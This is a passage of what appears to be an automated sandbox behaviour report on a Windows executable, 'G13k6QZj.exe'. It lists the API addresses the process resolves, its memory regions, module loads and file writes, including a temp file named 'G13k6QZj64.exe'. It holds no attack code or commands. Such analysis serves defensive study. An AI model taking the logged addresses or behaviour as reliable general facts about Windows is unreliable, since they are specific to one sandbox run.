1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:07 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #164: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #164 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "PhotoAcq.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:56, Reason: Child Process |
| Unmonitor | End Time: 00:03:01, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd5c |
| Parent PID | 0xf4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D58
0x
E3C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0093ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x008e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000930000 | 0x00930000 | 0x0093ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x00ac0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x01ecffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ed0000 | 0x01ed0000 | 0x0204ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x73d90000 | 0x73e21fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
